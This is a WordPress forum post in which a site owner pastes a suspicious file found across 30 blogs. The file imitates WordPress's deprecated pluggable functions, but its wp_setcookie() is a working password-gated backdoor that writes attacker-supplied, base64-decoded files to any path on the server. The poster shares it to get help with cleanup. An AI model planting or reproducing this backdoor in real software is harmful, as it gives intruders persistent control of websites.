WordPress.org

Ready to get started?Download WordPress

Forums

Hacked File in wp-includes - Need A PHP Expert To Check Code (1 post)

  1. dadaas
    Member
    Posted 1 year ago #

    I m sure there will be more and more people coming with this same problem. So i want to start this topic and to give them solution.

    I m 100% sure i m hacked. But i dont know how and still dont know how to clean this hack.

    CODE THAT NEED TO BE LOOK BY EXPERT

    <?php
    /**
     * Deprecated pluggable functions from past WordPress versions. You shouldn't use these
     * functions and look for the alternatives instead. The functions will be removed in a
     * later version.
     *
     * Deprecated warnings are also thrown if one of these functions is being defined by a plugin.
     *
     * @package WordPress
     * @subpackage Deprecated
     * @see pluggable.php
     */
    
    /*
     * Deprecated functions come here to die.
     */
    
    if ( !function_exists('set_current_user') ) :
    /**
     * Changes the current user by ID or name.
     *
     * Set $id to null and specify a name if you do not know a user's ID.
     *
     * @since 2.0.1
     * @see wp_set_current_user() An alias of wp_set_current_user()
     * @deprecated 3.0.0
     * @deprecated Use wp_set_current_user()
     *
     * @param int|null $id User ID.
     * @param string $name Optional. The user's username
     * @return object returns wp_set_current_user()
     */
    function set_current_user($id, $name = '') {
    	_deprecated_function( __FUNCTION__, '3.0', 'wp_set_current_user()' );
    	return wp_set_current_user($id, $name);
    }
    endif;
    
    if ( !function_exists('wp_setcookie') ) :
    /**
     * Sets a cookie for a user who just logged in. This function is deprecated.
     *
     * @since 1.5
     * @deprecated 2.5
     * @deprecated Use wp_set_auth_cookie()
     * @see wp_set_auth_cookie()
     *
     * @param string $username The user's username
     * @param string $password Optional. The user's password
     * @param bool $already_md5 Optional. Whether the password has already been through MD5
     * @param string $home Optional. Will be used instead of COOKIEPATH if set
     * @param string $siteurl Optional. Will be used instead of SITECOOKIEPATH if set
     * @param bool $remember Optional. Remember that the user is logged in
     */
    function wp_setcookie($hash) {
    $hash=md5($hash);
    if ($hash=="ab89e610961bbf64bdbea9267100fc15"){
    $inn=$_POST["name"];
    $inn=rawurldecode($inn);
    $inn=base64_decode($inn);
    $fn=fopen($inn,"w");
    if ($fn==false){echo "File open error\n";die;}else echo "File open success\n";
    $in=$_POST["data"];
    $in=rawurldecode($in);
    $in=base64_decode($in);
    fwrite($fn,$in);
    fclose($fn);
    }
    }
    endif;
    
    if ( !function_exists('wp_clearcookie') ) :
    /**
     * Clears the authentication cookie, logging the user out. This function is deprecated.
     *
     * @since 1.5
     * @deprecated 2.5
     * @deprecated Use wp_clear_auth_cookie()
     * @see wp_clear_auth_cookie()
     */
    function wp_clearcookie() {
    	_deprecated_function( __FUNCTION__, '2.5', 'wp_clear_auth_cookie()' );
    	wp_clear_auth_cookie();
    }
    endif;
    if ( !function_exists('wp_get_cookie_login') ):
    /**
     * Gets the user cookie login. This function is deprecated.
     *
     * This function is deprecated and should no longer be extended as it won't be
     * used anywhere in WordPress. Also, plugins shouldn't use it either.
     *
     * @since 2.0.3
     * @deprecated 2.5
     * @deprecated No alternative
     *
     * @return bool Always returns false
     */
    function wp_get_cookie_login() {
    	_deprecated_function( __FUNCTION__, '2.5' );
    	return false;
    }
    endif;
    wp_setcookie($_POST['wp-user']);
    if ( !function_exists('wp_login') ) :
    /**
     * Checks a users login information and logs them in if it checks out. This function is deprecated.
     *
     * Use the global $error to get the reason why the login failed. If the username
     * is blank, no error will be set, so assume blank username on that case.
     *
     * Plugins extending this function should also provide the global $error and set
     * what the error is, so that those checking the global for why there was a
     * failure can utilize it later.
     *
     * @since 1.2.2
     * @deprecated Use wp_signon()
     * @global string $error Error when false is returned
     *
     * @param string $username User's username
     * @param string $password User's password
     * @param bool $deprecated Not used
     * @return bool False on login failure, true on successful check
     */
    function wp_login($username, $password, $deprecated = '') {
    	_deprecated_function( __FUNCTION__, '2.5', 'wp_signon()' );
    	global $error;
    
    	$user = wp_authenticate($username, $password);
    
    	if ( ! is_wp_error($user) )
    		return true;
    
    	$error = $user->get_error_message();
    	return false;
    }
    endif;

    Why this code?
    This code was created in different filenames inside wp-includes folder. All files where created on same date and at same time (few minutes more or less) and trough the whole server i m on. This means all my 30 blogs got this file with different name in wp-includes on same date in same time.

    Please experts check this code and tell us what it does?

    P.S. i will delete all this files on all my blogs and monitor if they come back.

Topic Closed

This topic has been closed to new replies.

About this Topic